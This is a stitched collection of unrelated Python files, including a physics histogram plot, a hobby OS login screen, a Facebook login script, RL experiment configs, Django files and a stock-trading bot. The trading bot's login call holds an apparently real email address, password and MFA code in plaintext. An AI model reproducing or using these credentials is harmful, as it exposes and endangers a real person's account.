label="$bg\_vbf\_100\_200$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#829e8c", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y7_DELTAR_0_weights+y7_DELTAR_1_weights,\
label="$bg\_vbf\_0\_100$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#adbcc6", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y7_DELTAR_0_weights,\
label="$signal$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#7a8e99", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
# Axis
plt.rc('text',usetex=False)
plt.xlabel(r"\Delta R [ j_{1} , j_{2} ] ",\
fontsize=16,color="black")
plt.ylabel(r"$\mathrm{Events}$ $(\mathcal{L}_{\mathrm{int}} = 40.0\ \mathrm{fb}^{-1})$ ",\
fontsize=16,color="black")
# Boundary of y-axis
ymax=(y7_DELTAR_0_weights+y7_DELTAR_1_weights+y7_DELTAR_2_weights+y7_DELTAR_3_weights+y7_DELTAR_4_weights+y7_DELTAR_5_weights+y7_DELTAR_6_weights+y7_DELTAR_7_weights+y7_DELTAR_8_weights+y7_DELTAR_9_weights+y7_DELTAR_10_weights+y7_DELTAR_11_weights+y7_DELTAR_12_weights+y7_DELTAR_13_weights+y7_DELTAR_14_weights+y7_DELTAR_15_weights+y7_DELTAR_16_weights).max()*1.1
ymin=0 # linear scale
#ymin=min([x for x in (y7_DELTAR_0_weights+y7_DELTAR_1_weights+y7_DELTAR_2_weights+y7_DELTAR_3_weights+y7_DELTAR_4_weights+y7_DELTAR_5_weights+y7_DELTAR_6_weights+y7_DELTAR_7_weights+y7_DELTAR_8_weights+y7_DELTAR_9_weights+y7_DELTAR_10_weights+y7_DELTAR_11_weights+y7_DELTAR_12_weights+y7_DELTAR_13_weights+y7_DELTAR_14_weights+y7_DELTAR_15_weights+y7_DELTAR_16_weights) if x])/100. # log scale
plt.gca().set_ylim(ymin,ymax)
# Log/Linear scale for X-axis
plt.gca().set_xscale("linear")
#plt.gca().set_xscale("log",nonposx="clip")
# Log/Linear scale for Y-axis
plt.gca().set_yscale("linear")
#plt.gca().set_yscale("log",nonposy="clip")
# Legend
plt.legend(bbox_to_anchor=(1.05,1), loc=2, borderaxespad=0.)
# Saving the image
plt.savefig('../../HTML/MadAnalysis5job_0/selection_6.png')
plt.savefig('../../PDF/MadAnalysis5job_0/selection_6.png')
plt.savefig('../../DVI/MadAnalysis5job_0/selection_6.eps')
# Running!
if __name__ == '__main__':
selection_6()
|
#!/usr/bin/python3
"""
Login Manager
"""
import math
import os
import sys
import time
import cairo
import yutani
import text_region
import toaru_fonts
import fswait
import panel
from panel import PanelWindow, FillWidget, VolumeWidget, NetworkWidget, DateWidget, ClockWidget, RestartMenuWidget, LabelWidget
from input_box import InputBox
from dialog import DialogWindow
import yutani_mainloop
def rounded_rectangle(ctx,x,y,w,h,r):
degrees = math.pi / 180
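    # cairo's arc() takes radians measured from the +x axis; the four arcs below
    # trace the corners in order: top-right, bottom-right, bottom-left, top-left.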
ctx.new_sub_path()
ctx.arc(x + w - r, y + r, r, -90 * degrees, 0 * degrees)
ctx.arc(x + w - r, y + h - r, r, 0 * degrees, 90 * degrees)
ctx.arc(x + r, y + h - r, r, 90 * degrees, 180 * degrees)
ctx.arc(x + r, y + r, r, 180 * degrees, 270 * degrees)
ctx.close_path()
class LoginWindow(yutani.Window):
def __init__(self):
w = yutani.yutani_ctx._ptr.contents.display_width
h = yutani.yutani_ctx._ptr.contents.display_height
super(LoginWindow, self).__init__(w, h, doublebuffer=True)
self.move(0,0)
self.set_stack(yutani.WindowStackOrder.ZORDER_BOTTOM)
self.font = toaru_fonts.Font(toaru_fonts.FONT_SANS_SERIF, 11, 0xFFFFFFFF)
self.font.set_shadow((0xFF000000, 2, 1, 1, 3.0))
self.tr = text_region.TextRegion(0,0,200,30,font=self.font)
self.tr.set_text(f"PonyOS {os.uname().release}")
self.load_wallpaper()
def load_wallpaper(self):
tmp = cairo.ImageSurface.create_from_png('/usr/share/wallpapers/default')
self.wallpaper = cairo.ImageSurface(cairo.FORMAT_ARGB32, self.width, self.height)
x = self.width / tmp.get_width()
y = self.height / tmp.get_height()
nh = int(x * tmp.get_height())
nw = int(y * tmp.get_width())
ctx = cairo.Context(self.wallpaper)
if (nw > self.width):
ctx.translate((self.width - nw) / 2, 0)
ctx.scale(y,y)
else:
ctx.translate(0,(self.height - nh) / 2)
ctx.scale(x,x)
ctx.set_source_surface(tmp,0,0)
ctx.paint()
buf = yutani.GraphicsBuffer(self.wallpaper.get_width(),self.wallpaper.get_height())
tmp = buf.get_cairo_surface()
ctx = cairo.Context(tmp)
ctx.set_source_surface(self.wallpaper)
ctx.paint()
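        # three box-blur passes over the offscreen buffer approximate a gaussian blur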
yutani.yutani_gfx_lib.blur_context_box(buf._gfx, 20)
yutani.yutani_gfx_lib.blur_context_box(buf._gfx, 20)
yutani.yutani_gfx_lib.blur_context_box(buf._gfx, 20)
ctx = cairo.Context(self.wallpaper)
ctx.set_source_surface(tmp)
ctx.paint()
buf.destroy()
def draw(self):
surface = self.get_cairo_surface()
ctx = cairo.Context(surface)
# Paint blurred wallpaper
ctx.set_source_surface(self.wallpaper)
ctx.paint()
self.tr.move(10,self.height-24)
self.tr.draw(self)
self.flip()
def focus_changed(self, msg):
if msg.focused:
yutani.yutani_ctx.focus_window(prompts.wid)
def finish_resize(self, msg):
"""Accept a resize."""
self.resize_accept(msg.width, msg.height)
self.reinit()
self.load_wallpaper()
self.draw()
self.resize_done()
self.flip()
def keyboard_event(self, msg):
pass
class InputWindow(yutani.Window):
def __init__(self):
_w = yutani.yutani_ctx._ptr.contents.display_width
_h = yutani.yutani_ctx._ptr.contents.display_height
self.logo = cairo.ImageSurface.create_from_png('/usr/share/logo_login.png')
super(InputWindow, self).__init__(272, self.logo.get_height() + 110 + 50, doublebuffer=True)
self.update_position(_w,_h)
self.username = InputBox(placeholder="Username",width=180)
self.password = InputBox(password=True,placeholder="Password",width=180)
self.focused_widget = None
self.username.tab_handler = self.focus_password
self.password.tab_handler = self.focus_username
self.username.submit = self.password_or_go
self.password.submit = self.go
self.error_font = toaru_fonts.Font(toaru_fonts.FONT_SANS_SERIF, 11, 0xFFFF0000)
self.error_font.set_shadow((0xFF000000, 2, 0, 0, 3.0))
self.error_tr = text_region.TextRegion(0,0,self.width,20,font=self.error_font)
self.error_tr.set_alignment(2)
self.error = None
def focus_changed(self, msg):
if not msg.focused:
self.username.focus_leave()
self.password.focus_leave()
def update_position(self, w, h):
self.move(int((w - self.width)/2),int((h - self.height)/2))
def finish_resize(self, msg):
pass # lol no
def draw(self):
surface = self.get_cairo_surface()
ctx = cairo.Context(surface)
# Clear
ctx.set_operator(cairo.OPERATOR_SOURCE)
ctx.rectangle(0,0,self.width,self.height)
ctx.set_source_rgba(0,0,0,0)
ctx.fill()
ctx.set_operator(cairo.OPERATOR_OVER)
ctx.set_source_surface(self.logo, (self.width - self.logo.get_width())/2, 0)
ctx.paint()
base = self.height - 110
rounded_rectangle(ctx, 0, base, self.width, 110, 4)
ctx.set_source_rgba(0,0,0,0.5)
ctx.fill()
if self.error:
self.error_tr.move(0,base+8)
self.error_tr.set_text(self.error)
self.error_tr.draw(self)
ctx.save()
ctx.translate(46,base + 30)
self.username.draw(self,ctx)
ctx.restore()
ctx.save()
ctx.translate(46,base + 60)
self.password.draw(self,ctx)
ctx.restore()
self.flip()
def keyboard_event(self, msg):
if self.focused_widget:
self.focused_widget.keyboard_event(msg)
else:
self.focus_username()
self.focused_widget.keyboard_event(msg)
def focus_password(self):
self.username.focus_leave()
self.password.focus_enter()
self.focused_widget = self.password
self.draw()
def focus_username(self):
self.password.focus_leave()
self.username.focus_enter()
self.focused_widget = self.username
self.draw()
def password_or_go(self):
if self.password.text:
self.go()
else:
self.focus_password()
def go(self):
print(f"USER {self.username.text}")
print(f"PASS {self.password.text}")
print(f"AUTH",flush=True)
response = input()
if response == "FAIL":
self.error = "Incorrect username or password."
self.username.update_text("")
self.password.update_text("")
self.username.reset_cursor()
self.password.reset_cursor()
self.focus_username()
self.draw()
elif response == "SUCC":
sys.exit(0)
def mouse_event(self, msg):
if self.username.mouse_event(msg):
self.focus_username()
elif self.password.mouse_event(msg):
self.focus_password()
elif msg.command == yutani.MouseEvent.DOWN:
self.password.focus_leave()
self.username.focus_leave()
self.focused_widget = None
def maybe_animate():
tick = int(time.time())
if tick != panel.current_time:
try:
os.waitpid(-1,os.WNOHANG)
except ChildProcessError:
pass
panel.current_time = tick
panel_window.draw()
if __name__ == '__main__':
if os.getuid() != 0:
print("This is the GUI login client. You should not be running this. It is run by the GUI session manager.")
sys.exit(1)
print("Hello",flush=True)
yutani.Yutani()
d = yutani.Decor() # Just in case.
panel.current_time = int(time.time())
window = LoginWindow()
window.draw()
prompts = InputWindow()
prompts.draw()
def restart_callback():
def confirm():
print(f"RESTART",flush=True)
sys.exit(0)
DialogWindow(d,"Restart","Are you sure you want to restart?",callback=confirm,icon='exit')
restart = RestartMenuWidget()
restart.callback = restart_callback
widgets = [LabelWidget(os.uname().nodename), FillWidget(),VolumeWidget(),NetworkWidget(),DateWidget(),ClockWidget(),restart]
panel_window = PanelWindow(widgets)
panel_window.draw()
fds = [yutani.yutani_ctx]
while 1:
# Poll for events.
fd = fswait.fswait(fds,500)
maybe_animate()
if fd == 0:
while yutani.yutani_ctx.query():
msg = yutani.yutani_ctx.poll()
if msg.type == yutani.Message.MSG_WELCOME:
panel_window.resize(msg.display_width, panel_window.height)
window.resize(msg.display_width, msg.display_height)
prompts.update_position(msg.display_width, msg.display_height)
else:
if not yutani_mainloop.handle_event(msg):
sys.exit(0)
|
import requests
from selenium import webdriver
from bs4 import BeautifulSoup
session = requests.Session()
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) '
'Chrome/58.0.3029.110 Safari/537.36'
}
proxies = {
'http': 'socks5://127.0.0.1:1086',
'https': 'socks5://127.0.0.1:1086'
}
def get_args(html):
soup = BeautifulSoup(html, 'html.parser')
first_form = soup.find(attrs={'id': 'login_form'})
lsd = first_form.find(attrs={'name': 'lsd'}).get('value', '')
lgndim = first_form.find(attrs={'name': 'lgndim'}).get('value', '')
lgnrnd = first_form.find(attrs={'name': 'lgnrnd'}).get('value', '')
lgnjs = first_form.find(attrs={'name': 'lgnjs'}).get('value', '')
timezone = first_form.find(attrs={'name': 'timezone'}).get('value')
locale = 'zh_CN'
login_source = 'login_bluebar'
return dict(
lsd=lsd,
lgndim=lgndim,
lgnjs=lgnjs,
lgnrnd=lgnrnd,
timezone=timezone,
locale=locale,
login_source=login_source,
)
def pre_login(url):
resp = session.get(url, headers=headers)
if resp.status_code != 200:
raise Exception('login page request error')
return resp.text
def login(name, passwd, url, data):
data.update({'email': name, 'pass': passwd})
    session.post(url, data=data, headers=headers)
if __name__ == '__main__':
login_name = input('input your account\n')
login_pass = input('input your password\n')
first_url = 'https://www.facebook.com/'
page_source = pre_login(first_url)
post_url = 'https://www.facebook.com/login.php?login_attempt=1&lwv=111'
args = get_args(page_source)
login(login_name, login_pass, post_url, args)
check_url = 'https://www.facebook.com/profile.php?id=100017638279480&hc_ref=NEWSFEED&fref=nf'
resp = session.get(url=check_url, headers=headers)
print(resp.text)
|
from sandbox.rocky.tf.algos.maml_il import MAMLIL
from rllab.baselines.linear_feature_baseline import LinearFeatureBaseline
from rllab.baselines.gaussian_mlp_baseline import GaussianMLPBaseline
from rllab.baselines.maml_gaussian_mlp_baseline import MAMLGaussianMLPBaseline
from rllab.baselines.zero_baseline import ZeroBaseline
from rllab.envs.normalized_env import normalize
from rllab.misc.instrument import stub, run_experiment_lite
from sandbox.rocky.tf.policies.maml_minimal_gauss_mlp_policy import MAMLGaussianMLPPolicy
from sandbox.rocky.tf.optimizers.quad_dist_expert_optimizer import QuadDistExpertOptimizer
from sandbox.rocky.tf.optimizers.first_order_optimizer import FirstOrderOptimizer
#from rllab.envs.mujoco.ant_env_dense import AntEnvRandGoalRing
from rllab.envs.mujoco.ant_env_sparse import AntEnvRandGoalRing
from sandbox.rocky.tf.envs.base import TfEnv
# import lasagne.nonlinearities as NL
import sandbox.rocky.tf.core.layers as L
from rllab.envs.gym_env import GymEnv
#from maml_examples.reacher_env import ReacherEnv
#from rllab.envs.mujoco.pusher_env import PusherEnv
from maml_examples.maml_experiment_vars import MOD_FUNC
import numpy as np
import random as rd
#from examples.trpo_push_obj import
EXPERT_TRAJ_LOCATION_DICT = '/root/code/rllab/saved_expert_traj/Expert_trajs_dense_ant/'
#EXPERT_TRAJ_LOCATION_DICT = '/home/russellm/iclr18/maml_gps/saved_expert_traj/Expert_trajs_dense_ant/'
import tensorflow as tf
import time
beta_steps = 1
adam_steps_list = [50]
updateMode = 'vec'
adam_curve = None
fast_learning_rates = [1.0]
env_option = ''
# mode = "ec2"
mode = 'ec2'
extra_input = "onehot_exploration" # "onehot_exploration" "gaussian_exploration"
# extra_input = None
extra_input_dim = 5
fast_batch_size_list = [20] # 20 # 10 works for [0.1, 0.2], 20 doesn't improve much for [0,0.2] #inner grad update size
meta_batch_size_list = [40] # 40 @ 10 also works, but much less stable, 20 is fairly stable, 40 is more stable
max_path_length = 200 # 100
num_grad_updates = 1
meta_step_size = 0.01
pre_std_modifier = 1.0
post_std_modifier_train = 0.00001
post_std_modifier_test = 0.00001
l2loss_std_mult = 1.0
ism = ''
#importance_sampling_modifier_list = [''] #'', 'clip0.5_'
limit_demos_num = 40 # 40
test_goals_mult = 1
bas_lr = 0.01 # baseline learning rate
momentum=0.5
bas_hnl = tf.nn.relu
hidden_layers = (100,100)
basas = 60 # baseline adam steps
use_corr_term = True
# seeds = [1,2,3,4,5,6,7] #,2,3,4,5,6,7,8] #, 2,3,4,5,6,7,8]
seeds = [1] #,2,3,4,5,6,7,8] #, 2,3,4,5,6,7,8]
use_maml = True
test_on_training_goals = False
for seed in seeds:
for fast_batch_size in fast_batch_size_list:
for meta_batch_size in meta_batch_size_list:
for fast_learning_rate in fast_learning_rates:
for adam_steps in adam_steps_list:
stub(globals())
tf.set_random_seed(seed)
np.random.seed(seed)
rd.seed(seed)
env = TfEnv(normalize(AntEnvRandGoalRing()))
policy = MAMLGaussianMLPPolicy(
name="policy",
env_spec=env.spec,
grad_step_size=fast_learning_rate,
hidden_nonlinearity=tf.nn.relu,
hidden_sizes=(100, 100),
std_modifier=pre_std_modifier,
# metalearn_baseline=(bas == "MAMLGaussianMLP"),
extra_input_dim=(0 if extra_input is None else extra_input_dim),
updateMode = updateMode,
num_tasks = meta_batch_size
)
baseline = LinearFeatureBaseline(env_spec=env.spec)
algo = MAMLIL(
env=env,
policy=policy,
#policy=None,
#oad_policy='/home/alvin/maml_rl/data/local/R7-IL-0918/R7_IL_200_40_1_1_dem40_ei5_as50_basl_1809_04_27/itr_24.pkl',
baseline=baseline,
batch_size=fast_batch_size, # number of trajs for alpha grad update
max_path_length=max_path_length,
meta_batch_size=meta_batch_size, # number of tasks sampled for beta grad update
num_grad_updates=num_grad_updates, # number of alpha grad updates
n_itr=200, #100
make_video=False,
use_maml=use_maml,
use_pooled_goals=True,
use_corr_term=use_corr_term,
test_on_training_goals=test_on_training_goals,
metalearn_baseline=False,
# metalearn_baseline=False,
limit_demos_num=limit_demos_num,
test_goals_mult=test_goals_mult,
step_size=meta_step_size,
plot=False,
beta_steps=beta_steps,
adam_curve=adam_curve,
adam_steps=adam_steps,
pre_std_modifier=pre_std_modifier,
l2loss_std_mult=l2loss_std_mult,
importance_sampling_modifier=MOD_FUNC[ism],
post_std_modifier_train=post_std_modifier_train,
post_std_modifier_test=post_std_modifier_test,
expert_trajs_dir=EXPERT_TRAJ_LOCATION_DICT,
#[env_option+"."+mode+goals_suffix],
expert_trajs_suffix="",
seed=seed,
extra_input=extra_input,
extra_input_dim=(0 if extra_input is None else extra_input_dim),
updateMode = updateMode
)
run_experiment_lite(
algo.train(),
n_parallel=10,
snapshot_mode="all",
python_command='python3',
seed=seed,
exp_name='sparse_parallelSampling_c48',
exp_prefix='Maml_il_ant',
plot=False,
sync_s3_pkl=True,
mode=mode,
terminate_machine=True,
)
|
"""
Zinc Material Chooser Widget
Widget for chooses a material from a material module, derived from QComboBox
This Source Code Form is subject to the terms of the Mozilla Public
License, v. 2.0. If a copy of the MPL was not distributed with this
file, You can obtain one at http://mozilla.org/MPL/2.0/.
"""
try:
from PySide import QtCore, QtGui
except ImportError:
from PyQt4 import QtCore, QtGui
from opencmiss.zinc.material import Material
from opencmiss.zinc.status import OK as ZINC_OK
class MaterialChooserWidget(QtGui.QComboBox):
def __init__(self, parent=None):
'''
Call the super class init functions
'''
QtGui.QComboBox.__init__(self, parent)
self._nullObjectName = None
self._materialmodule = None
self._material = None
def _buildMaterialList(self):
'''
Rebuilds the list of items in the ComboBox from the material module
'''
self.blockSignals(True)
self.clear()
if self._materialmodule:
if self._nullObjectName:
self.addItem(self._nullObjectName)
materialiter = self._materialmodule.createMaterialiterator()
material = materialiter.next()
while material.isValid():
name = material.getName()
self.addItem(name)
material = materialiter.next()
self.blockSignals(False)
self._displayMaterial()
def _displayMaterial(self):
'''
Display the currently chosen material in the ComboBox
'''
self.blockSignals(True)
if self._material:
materialName = self._material.getName()
# following doesn't handle material name matching _nullObjectName
index = self.findText(materialName)
else:
index = 0
self.setCurrentIndex(index)
self.blockSignals(False)
def setNullObjectName(self, nullObjectName):
'''
Enable a null object option with the supplied name e.g. '-' or '<select>'
Default is None
'''
self._nullObjectName = nullObjectName
def setMaterialmodule(self, materialmodule):
'''
Sets the region that this widget chooses materials from
'''
self._materialmodule = materialmodule
self._buildMaterialList()
def getMaterial(self):
'''
Must call this from currentIndexChanged() slot to get/update current material
'''
materialName = str(self.currentText())
if self._nullObjectName and (materialName == self._nullObjectName):
self._material = None
else:
self._material = self._materialmodule.findMaterialByName(materialName)
return self._material
def setMaterial(self, material):
'''
Set the currently selected material
'''
if not material or not material.isValid():
self._material = None
else:
self._material = material
self._displayMaterial()
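# Usage sketch (illustrative only, not part of the widget): typical wiring from a
# parent widget, assuming a Zinc Context is available as `context`:
#
#   chooser = MaterialChooserWidget(parentWidget)
#   chooser.setNullObjectName('-')
#   chooser.setMaterialmodule(context.getMaterialmodule())
#   chooser.currentIndexChanged.connect(lambda index: print(chooser.getMaterial()))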
|
from .base_controller import BaseController
from telebot import TeleBot
from telebot.types import InlineKeyboardButton
from repositories.callback_types import NoneCallback
class NoneController(BaseController):
    def callback_name(self) -> str:
        return self._callback_name
def get_menu_btn(self) -> InlineKeyboardButton:
pass
def __init__(self, bot: TeleBot):
self._bot = bot
self.none_callback = NoneCallback()
        # stored under a private name so it does not shadow the callback_name() method above
        self._callback_name = self.none_callback.text
        @bot.callback_query_handler(func=lambda call: call.data.find(self._callback_name) != -1)
def _none_callback(call) -> None:
self.none_callback.func()
|
from django.contrib import admin
from userapp import models
admin.site.site_header = u"欢迎来到逸鹏说道"
admin.site.site_title = u"逸鹏说道后台"
# Register your models here.
admin.site.register(models.Express)
admin.site.register(models.ExpressOrder)
# 文件上传
class FileInfoAdmin(admin.ModelAdmin):
list_display = ["file_md5", "createtime", "updatetime", "datastatus"]
readonly_fields = ["file_md5"]
admin.site.register(models.FileInfo, FileInfoAdmin)
# 买家订单
class OrderAdmin(admin.ModelAdmin):
list_display = ["order_id", "createtime", "updatetime", "datastatus"]
readonly_fields = ["order_id", "datastatus"]
admin.site.register(models.Order, OrderAdmin)
|
import requests
class API(object):
"""
A dataset on the HMD instance
"""
def __init__(self, api_token, service_url="http://api.himydata.com/v1/dataset"):
self.service_url = service_url
self.api_token = api_token
def get(self, name, data=None):
"""
Method calls the dataset Api, get the contents of the dataset.
Response is paginated.
:param name:
:param data:
:return: http response
"""
url = self.service_url + ("/%s/" % name)
response = requests.get(url, data=data, headers=self.__get_default_headers())
return response
def insert(self, name, data=None):
"""
Method calls the dataset Api used to insert a row in the dataset.
:param name:
:param data:
:return: http response
"""
url = self.service_url + ("/%s/" % name)
response = requests.put(url, data=data, headers=self.__get_default_headers())
return response
def update(self, name, data):
"""
Method calls the dataset Api used to update a row in the dataset.
:param name:
:param data:
:return: http response
"""
url = self.service_url + ("/%s/" % name)
response = requests.post(url, data=data, headers=self.__get_default_headers())
return response
# todo opn back
# def datasetSchema(self, name, data=None):
# '''
# :type name : name of the dataset
# :rtype json
# '''
# url = self.service_url + ("/%s/"% name)
# response = requests.get(url, data=data, headers=self._getDefaultHeaders())
# return response
def get_config(self, name):
"""
Method returns the config to connect to the database where the dataset is stored.
The config is in a format specific for SqlAlchemy engine
:param name:
:return: json type
"""
url = self.service_url + ("/%s/checkConfig/" % name)
response = requests.get(url, headers=self.__get_default_headers())
if response.status_code != 200:
raise Exception("HTTP Exception {} : {}".format(response.status_code, response.text))
return response.json()
def status(self, name, data=None):
"""
Method returns the status of the dataset
:param name: name of the dataset
:param data:
        :return: http response
"""
url = self.service_url + ("/%s/status/" % name)
response = requests.post(url, data=data, headers=self.__get_default_headers())
return response
def logs(self, name, data=None):
"""
Method returns logs for the dataset
:param name: name of the dataset
:param data:
        :return: http response
"""
url = self.service_url + ("/%s/debug/" % name)
response = requests.post(url, data=data, headers=self.__get_default_headers())
return response
def __get_default_headers(self):
"""
:return: json type
"""
return {
"accept": "application/json",
"authorization": "Token " + self.api_token
}
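# Usage sketch (illustrative only; the token and dataset name are placeholders):
#
#   api = API(api_token="YOUR_TOKEN")
#   rows = api.get("my_dataset")                         # paginated contents
#   api.insert("my_dataset", data={"col": 1})            # add a row
#   api.update("my_dataset", data={"id": 3, "col": 2})   # update a row
#   print(api.status("my_dataset").text)                 # dataset status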
|
# This file was automatically created by FeynRules 2.3.35
# Mathematica version: 12.1.0 for Linux x86 (64-bit) (March 18, 2020)
# Date: Tue 18 Aug 2020 11:58:04
from object_library import all_couplings, Coupling
from function_library import complexconjugate, re, im, csc, sec, acsc, asec, cot
|
from .data import Document
|
import Petrinet
#This mode is for reachable markings
def Item4():
free = int(input("Input the token in free state: "))
wait = int(input("Input the token in wait state: "))
busy = int(input("Input the token in busy state: "))
inside = int(input("Input the token in inside state: "))
docu = int(input("Input the token in docu state: "))
done = int(input("Input the token in done state: "))
M0 = [wait,free,inside,busy,done,docu]
#Place marking
ps = [Petrinet.Place(m) for m in M0]
ts = dict(
start = Petrinet.Transition(
[Petrinet.In(ps[0]),Petrinet.In(ps[1])],[Petrinet.Out(ps[2]),Petrinet.Out(ps[3])]
),
change = Petrinet.Transition(
[Petrinet.In(ps[2]),Petrinet.In(ps[3])],[Petrinet.Out(ps[4]),Petrinet.Out(ps[5])]
),
end = Petrinet.Transition(
[Petrinet.In(ps[5])],[Petrinet.Out(ps[1])]
),
)
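    # transition summary: start: wait+free -> inside+busy; change: inside+busy -> done+docu; end: docu -> free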
print("The reachable marking from M0 are: ")
network = Petrinet.PetriNet(ts)
network.run_3(ps,ts)
|
def py2and3_test(**kwargs):
original_name = kwargs.pop("name")
kwargs["main"] = original_name + ".py"
py2_name = original_name + "_py2"
py3_name = original_name + "_py3"
native.py_test(
name = py2_name,
python_version = "PY2",
**kwargs
)
native.py_test(
name = py3_name,
python_version = "PY3",
**kwargs
)
native.test_suite(
name = original_name,
tests = [py2_name, py3_name],
)
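# Usage sketch (hypothetical BUILD file), assuming this macro is load()-ed as py2and3_test;
# it fans a single test out into <name>_py2 and <name>_py3 plus a test_suite named <name>:
#
#   py2and3_test(
#       name = "math_test",
#       srcs = ["math_test.py"],
#       deps = [":math_lib"],
#   )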
|
# Generated by Django 3.2.4 on 2021-06-18 02:02
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('systems', '0011_auto_20210617_2159'),
]
operations = [
migrations.RemoveField(
model_name='managedsystem',
name='details',
),
migrations.RemoveField(
model_name='systemscan',
name='ports',
),
migrations.RemoveField(
model_name='systemscan',
name='sys_name',
),
migrations.AddField(
model_name='managedsystem',
name='sys_scans',
field=models.ManyToManyField(blank=True, to='systems.SystemScan'),
),
migrations.AddField(
model_name='systemscan',
name='errors',
field=models.TextField(default=''),
),
migrations.AddField(
model_name='systemscan',
name='open_ports',
field=models.JSONField(default=dict),
),
migrations.AddField(
model_name='systemscan',
name='ports_to_scan',
field=models.CharField(blank=True, default='22-80', max_length=20),
),
migrations.AddField(
model_name='systemscan',
name='system',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='systems.managedsystem'),
),
migrations.DeleteModel(
name='SystemPorts',
),
]
|
furniture = ['table','chair','sofa','couch']  # renamed so the built-in list() is not shadowed
furniture.remove('table')
print(furniture)
|
import torch
from .. import model
import src
class Tier_1600(model.BaseModel):
def make_layers(self, D):
return [
src.modules.Reshape(1, D),
torch.nn.Conv1d(1, 4, 3, padding=1, stride=2),
src.modules.Transpose(1, 2),
src.modules.PrototypeClassifier(4, 16),
src.modules.polynomial.Activation(16, n_degree=4),
torch.nn.Linear(16, 1),
src.modules.Transpose(1, 2),
torch.nn.Conv1d(1, 4, 3, padding=1, stride=2),
src.modules.Transpose(1, 2),
src.modules.PrototypeClassifier(4, 16),
src.modules.polynomial.Activation(16, n_degree=4),
torch.nn.Linear(16, 1),
src.modules.Reshape(D//2//2),
torch.nn.Linear(D//2//2, 16),
src.modules.PrototypeClassifier(16, 16),
src.modules.polynomial.Activation(16, n_degree=4),
torch.nn.Linear(16, 1)
]
|
"""
Removes stop words produced from the script SemanticParser.py when deriving the method call dependency graph.
ex. python remove_stop_words.py [input].csv [output].csv [class_names].csv
"""
import csv
import sys
ebc_stop_words = ['com', 'ibm', 'elastic', 'build', 'cloud', 'api', 'core', 'external', 'system', 'bundle', 'feature', 'instance', 'ucd', 'jenkins', \
'logstash', 'openstack', 'rtc', 'resource', 'runtime', 'staticpool', 'unittest', 'util', 'web']
def removeStopWords(csvFileName, csvClassName):
class_name_file = open(csvClassName)
csv_reader = csv.reader(class_name_file)
class_name_list = []
for name in csv_reader:
class_name_list.append(name[0])
print(class_name_list)
csv_file = open(csvFileName)
csv_reader = csv.reader(csv_file, delimiter=',')
new_list = []
for line in csv_reader:
first_class = line[0].split(".")
second_class = line[1].split(".")
first_name = None
second_name = None
# Change the message name
if first_class[len(first_class)-1] == 'Messages':
if 'external' in first_class:
first_name = 'Messages[Duplicate_#001]'
elif 'api' in first_class:
first_name = 'Messages[Duplicate_#002]'
elif 'jenkins' in first_class:
first_name = 'Messages[Duplicate_#003]'
elif 'rtc' in first_class:
first_name = 'Messages[Duplicate_#004]'
elif 'util' in first_class:
first_name = 'Messages[Duplicate_#005]'
elif 'instance' in first_class:
first_name = 'Messages[Duplicate_#006]'
elif 'core' in first_class:
first_name = 'Messages[Duplicate_#007]'
elif 'openstack' in first_class:
first_name = 'Messages[Duplicate_#008]'
if second_class[len(second_class)-1] == 'Messages':
if 'external' in second_class:
second_name = 'Messages[Duplicate_#001]'
elif 'api' in second_class:
second_name = 'Messages[Duplicate_#002]'
elif 'jenkins' in second_class:
second_name = 'Messages[Duplicate_#003]'
elif 'rtc' in second_class:
second_name = 'Messages[Duplicate_#004]'
elif 'util' in second_class:
second_name = 'Messages[Duplicate_#005]'
elif 'instance' in second_class:
second_name = 'Messages[Duplicate_#006]'
elif 'core' in second_class:
second_name = 'Messages[Duplicate_#007]'
elif 'openstack' in second_class:
second_name = 'Messages[Duplicate_#008]'
if first_class[len(first_class)-1] in class_name_list and second_class[len(second_class)-1] in class_name_list:
if first_name is None:
first_name = first_class[len(first_class) - 1]
if second_name is None:
second_name = second_class[len(second_class) - 1]
if first_name is not None and second_name is not None:
new_list.append([first_name, second_name, line[2]])
return new_list
def writeCSV(reducedList, fileName):
with open(fileName, "w") as f:
writer = csv.writer(f)
writer.writerows(reducedList)
if __name__ == "__main__":
csvFileName = sys.argv[1]
outputFileName = sys.argv[2]
csvClassName = sys.argv[3]
list_of_ebc_classes = removeStopWords(csvFileName, csvClassName)
writeCSV(list_of_ebc_classes, outputFileName)
|
import pandas as pd
import numpy as np
from webull import paper_webull
# from webull import webull
from datetime import datetime
import time
import sched
import requests #for api considered gold standard for executing http request
import math # math formulas
from scipy.stats import percentileofscore as score # makes it easy to calculate percentile scores
from secrets import IEX_CLOUD_API_TOKEN
import talib
from talib import RSI, BBANDS
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
import yahoo_fin.stock_info as yf
# s = sched.scheduler(time.time, time.sleep)
#########
# CHECK IF MARKET IS OPEN
while True:
    # wait until the configured start hour before trading
now = datetime.now()
day=datetime.today().strftime('%A')
current_time = now.strftime("%H:%M:%S")
print('Today is', day, "Current Time is ", current_time)
if now.hour >= 2:# and now.minute>=30:# and now.hour<=14:# and now.hour<=14:
print('start')
break
else:
time.sleep(300)
###################
# LOG IN
wb = paper_webull()
result = wb.login('svalenzuela8@miners.utep.edu', 'Svelty+Car0+2o16!', device_name='', mfa='836177')
if result:
print("Logged In")
else:
print("get mfa Data")
# get porftolio info
portfolio = wb.get_portfolio()
# print(portfolio['cashBalance'])
# portfolio_size = portfolio['cashBalance']
print(portfolio['usableCash'])
# portfolio_size = portfolio['usableCash']
portfolio_size = 1000
### INITIALIZE
'''
here you want to define your universe
define you strategy parameters
define vareiagle to control trading fequency
schedule functions
'''
# import list of stocks
stocks = pd.read_csv('/home/vrmn/2021/notes/notes_stocks/sp_500_stocks.csv')
# stocks = yf.tickers_nasdaq()
# stocks = yf.tickers_sp500()
# stocks = pd.DataFrame(stocks)
